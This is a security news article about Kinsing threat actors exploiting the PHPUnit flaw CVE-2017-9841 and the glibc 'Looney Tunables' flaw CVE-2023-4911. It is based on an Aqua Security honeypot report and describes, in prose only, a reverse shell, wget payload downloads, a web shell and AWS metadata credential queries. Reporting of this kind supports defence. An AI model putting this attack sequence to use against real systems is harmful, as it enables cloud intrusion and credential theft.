Kinsing Attackers Experiments with "Looney Tunables" Exploit for Cloud Compromise

Threat actors associated with the Kinsing malware have been observed exploiting the Linux privilege escalation vulnerability in the GNU C Library, specifically, CVE-2023-4911 (aka Looney Tunables), to obtain credentials from cloud environments. In a report authored by Assaf Morag from Aqua Security, the attribution of this campaign to Kinsing is made with "100%" certainty; however, specific details are being withheld for a future report.

An analysis of the threat actor's activity in AquaSec's honeypots revealed that the attackers gain remote code execution capabilities by exploiting a PHPUnit vulnerability (CVE-2017-9841). This allowed them to download and execute a Perl script to open a reverse shell on port 1337. Morag describes the execution of multiple manual commands exhibiting "extensive trial and error," indicating that the Kinsing attackers were testing their latest attack strategy. These commands ultimately included seven relevant actions, such as querying system context (uname), reading from etc/passwd, attempting to open an interactive shell, creating a directory, and downloading several payloads with wget. These payloads included a script for the Looney Tunables vulnerability and a PHP script leading to a JavaScript web shell.

The script to exploit Looney Tunables was discovered to be directly sourced from a repository owned by a security researcher, @bl4sty. Upon notification by BleepingComputer, the researcher confirmed their intention to address this abuse. From their web shell, the threat actors attempted to query the AWS metadata service, signaling their ultimate intent to "enumerate the details and credentials associated with the Cloud Service Provider (CSP)." AquaSec noticed this deviated from the threat actor's typical goals, which primarily involve deploying their cryptominer, suggesting that the Kinsing threat actors are expanding their objectives and aiming for more "intense activities."